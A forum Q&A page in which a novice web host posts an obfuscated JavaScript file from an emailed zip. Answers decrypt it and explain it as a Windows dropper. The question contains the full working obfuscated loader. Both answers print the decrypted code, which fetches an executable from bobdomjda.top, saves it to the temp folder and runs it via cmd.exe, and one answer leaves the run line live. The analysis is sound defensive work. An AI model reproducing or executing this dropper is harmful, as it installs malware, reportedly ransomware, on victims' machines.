cPanel Question posted in
The official documentation can be seen here.

What does the following code snippet do? (JavaScript) – CPanel

So some background. I currently host a few small sites for my clients. I use cPanel.

Recently, I received an email on my server with a zip file. The zip file contains the following code:

function jqmqmkrehl(luezhqtygz)
{
	return parseInt(luezhqtygz,16);
}
function jvqissrxgt()
{
	var ftytqpuqjd="val12312312".match(/S{1}/g);
	return ftytqpuqjd[Math["floo"+""+"r"](Math.random()*ftytqpuqjd.length)];
}
function jqmqmkrehl(luezhqtygz)
{
	return parseInt(luezhqtygz,16);
}
function sehudasphf()
{
	var a = 1;
	var lzpxyboxat="f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
	"c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
	"7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
	"f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
	"99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
	"4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
	"bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
	"874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
	"414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
	"f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
	"9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
	"5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
	"c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
	"8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
	"4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
	"f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
	"881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";
	return lzpxyboxat;
}
function yneepaqzwu(yluyzuvvps)
{
	var mfjvremiuf;
	while(true){
		try
		{
			mfjvremiuf=(new Function("uneuuflaii","var zkyczguxoo=new Array(150,130,98,197,235,63,236,120,60,54,105,159),htcpxtvter=uneuuflaii.match(/\S{2}/g),xjrefvhonb="",ftvjsrrtfs=0;for(var ftvjsrrtfs=0,wgwizxghjb=0;ftvjsrrtfs<htcpxtvter.length;ftvjsrrtfs++,wgwizxghjb++){if(wgwizxghjb>=zkyczguxoo.length){wgwizxghjb=0;}xjrefvhonb+=String.fromCharCode(parseInt(htcpxtvter[ftvjsrrtfs],16)^zkyczguxoo[wgwizxghjb]);}e"+jvqissrxgt()+jvqissrxgt()+jvqissrxgt()+"(xjrefvhonb);")(yluyzuvvps));
			break;
		}
		catch(er)
		{
		}
	}
	return mfjvremiuf;
}
yneepaqzwu(sehudasphf());

All I know is that it is a javascript file, but I have no idea what this does. Can anyone enlighten me?
(P.S. I am literally brand new to programming.)

Tags:

2

Answers


  1. 0

    Here is what it does: The code decrypts the long string variable (var lzpxyboxat="f0f70ca69f5683161c510c...). The decrypted string is again JavaScript code, which is then executed. This is the decrypted code:

    function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

getData(function (data, error) {
    if (!error) {
        saveToTemp(data, function (path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run("cmd.exe /c start " + path + " & del *.js");
                } catch (error) {
                }
            }
        });
    }
});

    This code downloads a file from the URL (WARNING: potentially malicious file) http://bobdomjda.top/admin.php?f=2.gif. The file is saved in the temporary files folder and executed with cmd.exe /c start [filename].

    As far as I can see the downloading and execution will only work on Windows systems.

    I uploaded the file to VirusTotal: analysis result.

    Login or Signup to reply.
  2. 0

    Deobfuscating your script yields: 

    var encrypted =
    "f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
    "c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
    "7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
    "f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
    "99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
    "4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
    "bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
    "874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
    "414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
    "f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
    "9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
    "5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
    "c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
    "8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
    "4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
    "f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
    "881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";

function decrypt(encrypted) {
    var key = new Array(150, 130, 98, 197, 235, 63, 236, 120, 60, 54, 105, 159),
        bytes = encoded.match(/S{2}/g),
        code = "";

    for (var i = 0, j = 0; i < bytes.length; i++, j++) {
        if (j >= key.length) {
            j = 0;
        }
        code += String.fromCharCode(parseInt(bytes[i], 16) ^ key[j]);
    }

    return code;
}

// eval(decrypt(encrypted)); // commented out to prevent accidental execution

    The script contains encrypted JavaScript code and a decrypt function based on a simple XOR cipher.

    Decrypting the encrypted code yields:

    function getDataFromUrl(url, callback) {
    try{
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl(
            "http://bobdomjda.top/admin.php?f=2.gif",
            function(result, error) {
                if (!error) {
                    return callback(result, false);
                } else {
                    getDataFromUrl(
                        "http://bobdomjda.top/admin.php?f=2.gif",
                        function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                getDataFromUrl(
                                    "http://bobdomjda.top/admin.php?f=2.gif",
                                    function(result, error) {
                                        if (!error) {
                                            return callback(result, false);
                                        } else {
                                            return callback(null, true);
                                        }
                                    }
                                );
                            }
                        }
                    );
                }
            }
        );
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

getData(
    function (data, error) {
        if (!error) {
            saveToTemp(
                data,
                function (path, error) {
                    if (!error) {
                        try {
                            var wsh = new ActiveXObject("WScript.Shell");
                            // wsh.Run("cmd.exe /c start "+path+" & del *.js"); // Commented out to prevent accidental execution
                        } catch (error) {}
                    }
                }
            );
        }
    }
);

    This script

    1. Downloads an executable file from http://bobdomjda.top/admin.php?f=2.gif
    2. Uses ActiveX (“Scripting.FileSystemObject”, “ADODB.Stream”) to save it on your local filesystem as e.g. “owynovqn2.exe”
    3. Uses ActiveX (“WScript.Shell”) to execute it.

    According to virustotal.com, 8 of 61 virus scanners recognize the executable file as malicious, e.g. McAfee classifies it as “BehavesLike.Win32.Ransom.dc”.

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search